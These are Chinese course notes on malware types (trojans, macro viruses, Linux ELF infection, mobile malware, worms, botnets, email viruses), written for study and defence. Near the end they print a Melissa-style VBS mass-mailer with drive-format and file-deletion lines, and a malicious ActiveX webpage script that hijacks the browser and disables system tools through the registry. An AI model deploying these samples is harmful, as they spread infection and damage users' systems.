病毒学笔记二——典型病毒分析

[TOC]

计算机木马

计算机木马简介

木马的定义

特洛伊木马（木马）是一种基于远程控制技术的恶意程序。一旦入侵系统，攻击者可以在用户毫无察觉的情况下获得对其的远程控制和访问权限。

木马与一般合法远程控制软件的显著区别在于隐蔽性和非授权性。

区分一个程序是否是木马，一般从其意图来确定。木马的最终意图是窃取信息、实施远程监控。

木马与一般病毒

木马不具备一般病毒自我复制、自我传染的特性，但具有寄生性，常与合法软件捆绑，因而属于广义病毒。

木马的结构

木马程序

非法驻留在受害者系统中并窃取信息，负责接收控制程序的指令并向其发送数据
配置程序

负责配置木马通信端口、触发条件等，可以增强木马隐蔽性
控制程序

攻击者通过控制程序对受害者进行远程控制

控制程序与配置程序的功能不必严格区分。

木马与常规C/S模式的区别

常规模式是服务器控制客户端，而木马是客户端控制服务器

因而木马程序应该植入到服务器上

计算机木马的工作原理

基本工作方式

配置

编写木马配置文件，伪装木马程序
传播

通过各种方式将木马程序传播至其他主机
运行

木马程序自动在受害者主机上安装，并拷贝到系统文件夹，之后修改注册表、启动组等设置触发条件
反馈

木马程序被触发后，将服务器的IP等信息发送给客户端。
连接

客户端接受信息后，根据内容与受害者主机建立连接，连接需要满足两个条件
- 受害者安装了木马程序
- 客户端与服务器同时在线
控制

建立通信后攻击者即可利用控制程序向服务器发送指令

传播方式

邮件
聊天工具传输软件
软件下载网站
通过病毒或蠕虫传播
磁盘传播
网页JS脚本
系统漏洞

木马的危害

窃取数据
篡改数据
删除数据
操纵注册表
远程监视
释放病毒
毁坏系统（造成芯片过热熔毁等）

木马的分类

木马的特性

隐蔽性

运行时不为受害者所知，与正常远程控制软件有明显区别。
非授权行性

程序享有系统的大部分操作权限，而这些权限没有经过用户许可。
欺骗性

木马程序一般与合法软件绑定安装，或者通过后缀名欺骗的方式诱骗用户点击，而后木马程序会在用户不知情的情况下安装。
自动运行性

木马程序会在系统启动时启动，不需要受害者额外操作。
自动恢复性

木马程序本身有多重备份，且一个程序会分片储存在不同区域，可以随时恢复。
主动性

木马程序会主动打开端口，而且一般是不常用的端口。
功能特殊性

木马程序会进行扫描IP、控制键盘等常规远程控制程序不包含的操作。

木马分类

根据破坏方式分类

破坏型

毁坏删除文件
密码发送型

发送受害者密码
远程访问型

可以随意访问受害者硬盘
键盘记录型

查询键盘记录以窃取密码
Dos攻击型

作为Dos攻击的辅助手段（其他攻击也有类似的辅助木马）
代理型

将受害者主机作为攻击者进一步攻击的跳板，从而隐藏攻击者真实痕迹
FTP型

打开21端口，让任何拥有FTP服务的用户可以随意在受害者主机上传或下载文件
程序杀手型
关闭主机上的防木马软件（悲

根据传输方式分类

主动型

木马客户端扫描服务器并主动连接进行访问控制。
反弹端口型

该类木马是为了应对防火墙对开放端口的限制而产生的。

木马服务器使用主动端口而控制端使用被动端口，服务器定时扫描客户端，若客户端上线则服务器主动建立连接。
嵌入型

将木马嵌入到浏览器、网络聊天设备甚至系统通信程序中，从而躲过一般的检测方法。

木马的技术

伪装方式

更改图标

将图标改为JPG、ZIP等格式的图标
绑定文件

捆绑在合法程序上运行
出错提示

木马为了增强自身隐蔽性，在运行时通常没有现象。但如果用户主动点击木马程序却发现没有现象，则可能引起怀疑。

因此木马制造者会加入一个虚假的错误提示以欺骗用户。
自我销毁

用户可以比对最近下载文件以及系统文件夹中文件大小发现木马，因此木马有时会在安装后销毁原件。
修改名字

隐藏方式

任务栏隐藏
任务管理器隐藏
随机端口
隐藏通信
隐藏加载
新型隐藏技术

启动方式

捆绑启动
隐藏在系统配置文件
隐藏在应用程序配置文件
隐藏在启动文件

如在 Win.ini 的 load=、 run= 或者 System.ini的 shell= 、driver=后添加木马程序名字
伪装成图片诱导用户点击
内置到注册表
隐藏到启动组
修改关联文件

例如打开txt文件会启动notepad.exe查看，木马可以将其修改为自身，这样点击文本文件就会启动木马。
修改运行可执行文件的方式
超链接

自启动技术

加载到启动组
修改Boot.ini
修改注册表
修改 Explorer.exe的启动参数

隐藏技术

躲避防火墙

反弹式木马
躲避端口查看
- 寄生
  
  嵌入式木马
- 潜伏
  
  使用非TCP、UDP协议通信
进程隐藏
- 注册为系统服务
  - 仅Win9x可用
- API截获
  - 截获系统调用，返回替换数据（与前文病毒隐藏类似）
- DLL木马
  - DLL文件由多个函数构成，不能独立执行，类似API库。
  - 可用将木马编写为DLL形式然后由其他程序调用
- 远程线程
  - 在已有进程中创建木马运行的子线程
秘密信道技术
- 利用ICMP的标识符、序列号、选项数据区发送消息。
- 将消息插入HTTP报文的无用段
- 合并端口
  - 将木马端口与其他进程端口绑定

远程监控技术

木马的主要功能！

远程监视
远程控制

木马清除

木马清除的一般流程

“广外女生” 木马清除示例

前提：

该木马修改注册表中可执行文件的执行情况，使得执行任何文件时都先运行木马

打开注册表 regedit.exe
打开任务管理器，结束木马进程

注意，这里必须先打开注册表。因为若先结束进程，根据木马启动原理，执行注册表 regredit.exe前木马又会重新启动！
删除注册表中关于木马的内容
找到木马文件位置，删除文件

事实上，在进行了第三步后，木马因无法激活而失去其功效，第四步可以省略。

宏病毒

宏病毒概念

宏

一系列命令的集合，用于完成某些特定功能。

定义

宏病毒是利用系统的开放性专门制作的一个或多个具有病毒特点的宏的集合，这种病毒宏的集合影响到计算机的使用，并能通过文档及模板进行自我复制及传播。

宏病毒随文档加载而一直存在于系统中，因而是一直驻留内存病毒。

宏病毒传染的条件

可以将宏命令代码附加在文档上
宏命令可以在不同文档间共享
可以在未经允许的情况下获得某些控制权

宏病毒广泛传播的原因

文档是计算机中交流最广泛的文件类型
用户对文档的警惕性较弱
宏病毒可以在多平台传播

宏病毒的特点

传播快
- 文档使用广泛
- 点击文档即传染
制作简单
- Word具有开放性，任何人都可以编写宏
- 以往的宏病毒也具有开放性，可以被其他人修改为变种
破坏可能性大
- 宏病毒的编写语音WordBasic可以调用很多系统指令，任意使用可能对底层系统造成破坏
- 早期Word对指令安全性审查存在缺陷
多平台交叉
- 文档文件可以在各种平台被查看
地域性
- 不同地区使用Word版本不同

局限性

依赖于一个可受感染的系统，如Word、Excel等

经典宏病毒

Melissa

感染后会调用Outlook联系人的前50名并发送含有该病毒附件的邮件。
台湾NO.1B

感染后用户打开任何文档都会要求计算一个连乘式，若计算错误或用户直接关闭文档，则会自动打开20个新文档。
O97M.Tristate.C

能够使Excel的宏病毒保护功能失效。

宏病毒工作原理

宏病毒的共性

感染.doc文档文件以及.dot模板文件
打开文档文件时激活，感染Normal模板文件，之后传播至其他文档
含有 AutoOpen、AutoClose 等自动宏语句
包含对文档的读写操作

感染过程

graph LR;
1(打开被感<br>染的文档)-->2(把宏加载<br>到内存);
2-->3(运行<br>自动宏);
3-->4(宏病毒将自身<br>复制到模板);
4-->5(打开/新建<br>文档);
5-->6(调用被感<br>染的模板);
6-->7(文档<br>被感染);
7-->1;

LINUX病毒

LINUX系统安全性

LINUX系统虽然相较于Dos、早期Win有了保护机制，但是在root权限下，这些保护机制是没有用的，一旦病毒获取root权限，仍然可以像感染其他系统一样感染LINUX系统。
LINUX系统程序由明文编写的源代码构成而非二进制程序，表面上看病毒很容易被识别，但是只有极少数用户才具备阅读源代码的能力，更多的普通用户仍然习惯于直接运行二进制文件，因此病毒具有足够的机会传播。

LINUX病毒分类

Shell脚本型病毒
蠕虫病毒
欺骗库函数
内核级病毒
平台兼容型病毒

Shell脚本病毒

Shell脚本由Linux的shell脚本语言编写，编写简单，其在Linux的各个版本差别不大，因此病毒传播性较好，但攻击性一般；另外，由于Shell脚本是明文编写的，易于查杀。

ELF格式文件感染

ELF文件

ELF格式是LINUX下可执行文件的文件类型，其具有以下三个部分

目标文件

描述目标文件的主要类型
程序装载和动态链接

描述系统创建和运行程序的行为
C标准库

程序运行时所使用的库函数

无关ELF文件格式感染

即简单感染，它没有涉及任何可执行文件的内容，直接使用可独立执行的病毒代码。这种破坏式传染的病毒在感染一个文件后就很难继续传播，因为一方面它易于被发现移除，另一方面造成大量文件被破坏从而导致系统损害，得不偿失。

覆盖式感染

病毒通过覆盖宿主文件的一部分来达到不改变文件大小的目的。

其感染方式一般为先将宿主文件拷贝到另一个隐藏文件中，之后病毒再覆盖原文件的部分内容。

追加式感染

将病毒追加到宿主文件之后或将宿主文件追加到病毒代码后面，不包含覆盖行为。

ELF格式感染

ELF格式的可执行文件包含一个文本段和一个数据段，通常来说，文本段不具有可写权限而数据段是可写可执行的。每个段都分为固定大小的块，块结尾不满的需要填充；文本段与数据段之间也存在一定的填充。ELF格式感染就是利用了这些填充区域，以及函数对齐填充区域。

文本段与数据段之间填充
文本段后填充
数据段后插入

该感染方式利用了部分系统中ELF文件数据段可执行的特征，如果某个系统的ELF文件数据段不具备可执行权限，那么病毒就无法运行。此时只能考虑另外的方法。
文本段前插入

将病毒代码插入至文本段之前，然后修改文件头使之指向新的受感染文件的头部。
函数对齐填充
- 原理
  
  将病毒分割成几个段，修改每段最后部分，添加跳转语句，将病毒各个段分别放进不同的函数填充区内。修改文件头使之指向病毒开始处并能够使病毒结束后指向宿主程序入口处。
- 缺陷
  - 对填充区大小有要求，必须能够至少包含一条跳转语句
  - 对技术要求很高

LINUX高级感染技术

PLT/GOT劫持

PLT和GOT的作用是处理两个ELF文件之间的链接问题。PLT是一张包含程序转移控制入口的表，GOT是全局地址偏表。当一个程序需要调用库时，首先查询PLT，之后根据GOT中的地址跳转。

PLT/GOT劫持即通过修改相关代码使得原本程序的库函数调用变成调用病毒代码。

PLT/GOT劫持仍然属于用户级感染。

LKM感染

可加载内核模块也是ELF的目标文件，但属于系统级，它是一种可以被动态加载，不需要重新编译的内核。

病毒也可以利用LKM实现进程或文件的隐藏，LKM感染属于内核级感染。

移动终端病毒

PDA

PDA即个人数字助理，也成为掌上电脑，包括工业级和消费品两大类，工业级PDA有条形码扫描器、RFID读写机、POS机；消费品PDA则包括智能手机、平板、游戏机等。

手机病毒

手机病毒

以手机为感染对象，以手机网络和计算机网络为平台，通过病毒短信等形式对手机终端进行攻击的新型病毒
移动终端恶意代码

以移动终端为感染对象，通过无线或有线的通讯形式，对移动终端进行攻击并造成移动终端异常的代码。是对移动终端各种病毒的广义称呼。

移动终端操作系统

智能手机操作系统

symbian
Windows Mobile
Linux
Android
IOS

PDA操作系统

Palm
Win CE
Pocket PC
Linux
EPOC

移动终端安全隐患

用户安全意识薄弱
受限于硬件资源和网络资源，杀毒能力薄弱
操作系统弱点
- 不支持访问控制
- 不具备审计能力
- 缺少通过身份认证进行重用控制的能力
- 不对数据完整性进行保护
- 调试模式可以轻易获取用户密码
- 在密码锁定的情况下仍可以安装应用程序

移动终端恶意代码技术

传播途径

终端 $\rightarrow$ 终端

以蓝牙、红外等无线连接为主要感染媒介
终端 $\rightarrow$ 网关 $\rightarrow$ 终端

攻击者利用手机向网关发送恶意代码，被感染的网关随后将其传播至其他终端
计算机 $\rightarrow$ 终端

终端连接到受感染的计算机上

攻击方式

短信
直接攻击相邻手机
攻击网关
漏洞利用
木马

早期恶意代码的生存环境

系统相对封闭

早期移动终端系统不对普通用户开放，一般很难接触到。
创作空间狭窄

早期设备中可写区域太小，很难容下一个可执行代码
数据格式单一

早期设备均采用文本数据，而文本数据是最难被感染的

恶意代码产生契机

类JAVA应用程序

类JAVA程序的大量应用使得恶意代码的编写变得简单
操作系统趋于稳定

标准化通用操作系统的确立以及部分API的开放
设备容量扩大

设备存储的增加使得病毒有了更多的藏身之地
数据格式多元化

设备支持二进制文件后病毒就可以附着在这类文件上进行传播

移动终端设备漏洞

PDU格式漏洞
特殊字符漏洞
Vcard漏洞
%String 漏洞

移动终端恶意代码防范

注意来电信息

对于一些包含特殊符合的来电应提高警惕
谨慎网络下载
不接受怪异短信
关闭无线连接
- 对于自己不了解的信息源，应当关闭无线连接
- 若发现手机被无线连接感染，应当迅速咨询厂商安装补丁
注意安全信息

时刻关注主流安全厂商发布的信息

蠕虫

蠕虫与病毒的差异

	病毒	蠕虫
存在形式	寄生	独立个体
复制机制	插入到宿主文件	自身全拷贝
传染机制	宿主文件运行	利用系统漏洞
目标	本机文件	联网计算机
触发	计算机使用者	自身
影响重点	文件、磁盘	网络、系统资源
计算机使用者	关键环节	无关
防治措施	删除相关代码	系统补丁

蠕虫分类

网络蠕虫
- 该蠕虫由若干段组成，每段分布在网络中的不同计算机上
- 各段之间通过网络通信且由一个主段协调
主机蠕虫
- 各部分都在同一台计算机上
- 同一时刻只有一个副本在运行

网络蠕虫

根据网络蠕虫利用漏洞的不同，又可以分为

邮件蠕虫

利用MIME协议漏洞
网页蠕虫
- 利用IFrame在网页插入一个Mail，之后类似邮件蠕虫传播
- 直接利用IFrame或网页下载漏洞
系统漏洞蠕虫
- 利用RPC溢出的冲击波蠕虫
- 利用LSASS溢出的震荡波蠕虫

蠕虫的基本原理

蠕虫的实体结构

未编译源代码

一些参数需要在编译时才能确定
已编译链接模块

不同系统需要不同的运行模块
可执行代码
脚本

对源代码的一些补充和简化
受感染系统的可执行程序
信息数据

一些用户数据或蠕虫自身的数据

蠕虫功能结构

蠕虫的攻击方式

扫描策略

随机选取一段IP然后扫描该段上的每一个地址

缺点

可能导致重复扫描
改进
- 着重扫描当前主机所在网段，对外网只随机扫描小范围IP段
- 限制扫描次数
- 在不同时间扫描
扫描原则
- 尽可能减少重复
- 覆盖范围尽可能大
- 时间分布要合理
- 反复试验后选择最优策略

传播模型

传播模型(见前文)

蠕虫爆发定理

一个大规模蠕虫爆发的充分必要条件是初始易感主机的数目S(0)>ρ

蠕虫行为特征

主动攻击
行踪隐蔽
漏洞利用
造成网络拥塞
降低系统性能
安全隐患
反复性
破坏性

蠕虫技术发展

超级蠕虫

一次针对多个漏洞
分布式蠕虫
动态功能升级
通信技术
结合黑客技术
- 动态改变攻击代码以逃避IDS检测
- 建立秘密信道
- 利用内核级后门控制系统
结合病毒技术

蠕虫防治

防止策略

从实体结构看

破坏实体结构的一个环节可以使蠕虫不能正常工作
从功能结构看

破坏某个功能使其不能进行某种行为

防治周期

预防
- 系统升级
- 安装防火墙
- 安装入侵检测
检测
- 检测流量
- 检测TCP通信
遏制
清除
- 系统补丁

对未知蠕虫检测

流量监控
TCP通信异常检测
ICMP数据异常分析

目的主机不可到达的ICMP通信会返回ICMP-T3数据包，只要分析这些数据包即可找出蠕虫

对已知蠕虫检测

端口扫描
攻击行为监测
传染过程监测

清除过程

为系统添加最新补丁
打开任务管理器，关闭蠕虫程序
打开注册表，删除蠕虫启动组
删除蠕虫文件

僵尸网络

简介

定义

僵尸网络（BotNet）是指采用一种或多种传播手段，将大量主机感染bot程序（僵尸程序）病毒，从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。被感染的主机将通过一个控制信道接收攻击者的指令，并执行该指令。

构成

僵尸计算机

被植入Bot程序的计算机
控制服务器
僵尸网络

被攻击者控制的计算机群

特点

分布式
恶意传播

采取主动漏洞攻击、恶意邮件等形式攻击
一对多控制

僵尸网络和木马

相同点

都可以实现远程控制和行为监控
不同点
- 木马是一对一
- 木马是客户端控制服务器；僵尸网络是正常C/S结构

工作过程

传播阶段

即时通信软件
邮件病毒
主动攻击漏洞
恶意网站脚本
木马

加入阶段

受感染计算机会随着僵尸程序的运行而加入到僵尸网络中，不同协议下的加入过程有所不同

控制阶段

攻击者可以向僵尸计算机发送指令，使其执行一些恶意行为或窃取信息。

危害

DDos攻击
发送邮件
窃取信息
滥用资源

Outlook邮件病毒

简介

原理

病毒主要通过Outlook的可编程特性实现。在收件人使用Outlook打开邮件或附件时，里面的病毒就会自动激活并向通信簿中的所有人发送带病毒邮件，从而导致病毒的大规模迅速传播，最终导致邮件服务器耗尽资源而瘫痪。

典型病毒

“美丽莎（Melissa）”—宏病毒
“库尔尼科娃”
“主页(HomePage)”
“欢乐时光（HappyTime）”

病毒邮件预防

不要轻易打开附件
不随意转发邮件
关闭Windows中VBS脚本执行权限
打开文件扩展名
提高系统安全等级
杀毒软件

VBS脚本阅读

将文件保存至C盘下

1 2	Set fso=CreateObject("Scripting.FileSystemObject") fso.GetFile(WScript.ScriptFullName).Copy("C:\temp.vbs")

将文件作为附件发送给联系人中的前50个

Set ola=CreateObject("Outlook.Application") 
On Error Resume Next 
For x=1 To 50 
Set Mail=ola.CreateItem(0) 
Mail.to=ola.GetNameSpace("MAPI").AddressLists(1).Addr
essEntries(x) 
Mail.Subject="Betreff der E-Mail" 
Mail.Body="Text der E-Mail" 
Mail.Attachments.Add("C:\temp.vbs") 
Mail.Send 
Next 
ola.Quit

打开磁盘格式化窗口

1 2	Set obj = Wscript.CreateObject(“Wscript.Shell”) Obj.Run ("rundll32.exe shell32.dll, SHFormatDrive")

关闭Windows

1 2	Set obj = Wscript.CreateObject("Wscript.Application") Obj.ShutdownWindows

删除当前目录下的.exe可执行文件

1 2	Set obj = Wscript.CreateObject("Wscript.Shell") Obj.Run("Command.com /C DEL *.EXE, 0, False")

修改注册表

1
2
3

Set obj = Wscript.CreateObject("Wscript.Shell")
– Obj.RegWrite ("HKey_Local_Machine\Software\Microsoft,TestValue")

网页恶意代码

基于Java脚本的恶意代码
基于PHP的恶意脚本代码
基于Vbs脚本的恶意代码

java恶意脚本实例

ActiveX initialization 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 

//创建几个实例
a1.createInstance(); 
Shl = a1.GetObject(); 
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
a1.createInstance(); 
FSO = a1.GetObject(); 
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Net = a1.GetObject(); 
try 
{ 
if (documents .cookies.indexOf("Chg") == -1) 
{ 
    
//设置IE起始页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.on888.home.chinaren.com/");
    
//设置COOKIES 
var expdate = new Date((new Date()).getTime() + (1)); 
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
    
//消除RUN按钮
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoRun", 01, "REG_BINARY"); 
    
//消除关闭按钮
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoClose", 01, "REG_BINARY"); 
    
//消除注销按钮
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoLogOff", 01, "REG_BINARY"); 
    
//隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\Explorer\\NoDrives", "63000000", "REG_DWORD"); 
    
//禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\System\\DisableRegistryTools", "00000001", "REG_DWORD");
    
//禁止运行DOS程序
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
    
//禁止进入DOS模式
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
    
//开机提示窗口标题
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
\\LegalNoticeCaption", "你已经中毒…");
    
//设置IE标题
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window 
Title",
"你已经中毒…"); 
} } 
catch(e) 
{} 
} 
catch(e) 
{} 
}

//初始化函数
function init() 
{ 
setTimeout("f()", 1000); 
} 

//开始执行
init();

流氓软件

流氓软件往往采用特殊手段频繁弹出广告窗口、危及用户隐私，严重干扰用户的日常工作、数据安全和个人隐私。

简介

定义

定义一

具有一定的实用价值但具备电脑病毒和黑客的部分行为特征的软件，会使你无法卸载、并强
行弹出广告和窃取用户的私人信息等危害。

定义二

流氓软件是介于病毒和正规软件之间的软件，同时具备正常功能(下载、媒体播放等)和恶意行为(弹广告、开后门)，给用户带来实质危害。

特征

强行安装
抵制卸载
干扰使用
- 修改用户软件设置
- 弹出广告
具有病毒和黑客特征
- 存在窃取信息或侵犯合法权益的潜在危害
- 未经许可收集个人隐私